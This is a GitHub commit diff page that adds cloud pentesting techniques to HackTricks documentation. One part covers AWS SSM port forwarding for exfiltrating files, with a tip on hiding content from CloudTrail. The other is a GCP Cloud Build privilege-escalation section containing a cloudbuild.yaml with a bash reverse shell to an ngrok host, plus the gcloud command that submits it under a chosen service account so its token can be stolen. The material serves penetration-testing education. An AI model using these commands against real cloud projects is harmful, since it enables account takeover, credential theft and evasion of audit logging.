Skip to content

Commit 1ca7eee

Browse files
committed
Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud
2 parents 1c8836c + cf13ea9 commit 1ca7eee

File tree

3 files changed

+71
-6
lines changed

3 files changed

+71
-6
lines changed

searchindex.js

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -138,6 +138,54 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls-
138138

139139
Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
140140

141+
---
142+
143+
#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)
144+
145+
If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required):
146+
147+
```bash
148+
aws ssm start-session --target i-0123456789abcdef0 \
149+
--document-name AWS-StartPortForwardingSession \
150+
--parameters "portNumber"="8000","localPortNumber"="8000" \
151+
--region <REGION>
152+
```
153+
154+
The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.
155+
156+
Common use cases:
157+
158+
* **File exfiltration**
159+
1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:
160+
161+
```bash
162+
python3 -m http.server 8000
163+
```
164+
165+
2. From your workstation fetch the files through the SSM tunnel:
166+
167+
```bash
168+
curl http://localhost:8000/loot.txt -o loot.txt
169+
```
170+
171+
* **Accessing internal web applications (e.g. Nessus)**
172+
173+
```bash
174+
# Forward remote Nessus port 8834 to local 8835
175+
aws ssm start-session --target i-0123456789abcdef0 \
176+
--document-name AWS-StartPortForwardingSession \
177+
--parameters "portNumber"="8834","localPortNumber"="8835"
178+
# Browse to http://localhost:8835
179+
```
180+
181+
Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:
182+
183+
```bash
184+
# On the instance
185+
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'
186+
```
187+
188+
141189
### Share AMI
142190

143191
```bash
@@ -474,6 +522,10 @@ if __name__ == "__main__":
474522
main()
475523
```
476524
525+
## References
526+
527+
- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)
528+
477529
{{#include ../../../../banners/hacktricks-training.md}}
478530
479531

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md

Lines changed: 18 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -15,15 +15,28 @@ For more information about Cloud Build check:
1515
With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
1616
Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
1717

18+
#### Direct exploitation via gcloud CLI
19+
20+
1- Create `cloudbuild.yaml` and modify with your listener data
21+
```yaml
22+
steps:
23+
- name: bash
24+
script: |
25+
#!/usr/bin/env bash
26+
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
27+
options:
28+
logging: CLOUD_LOGGING_ONLY
29+
```
30+
2- Upload a simple build with no source, the yaml file and specify the SA to use on the build:
31+
```bash
32+
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com
33+
```
34+
35+
#### Using python gcloud library
1836
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
1937

2038
For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
2139

22-
### `cloudbuild.builds.update`
23-
24-
**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
25-
26-
TODO
2740

2841
### `cloudbuild.repositories.accessReadToken`
2942

0 commit comments

Comments
 (0)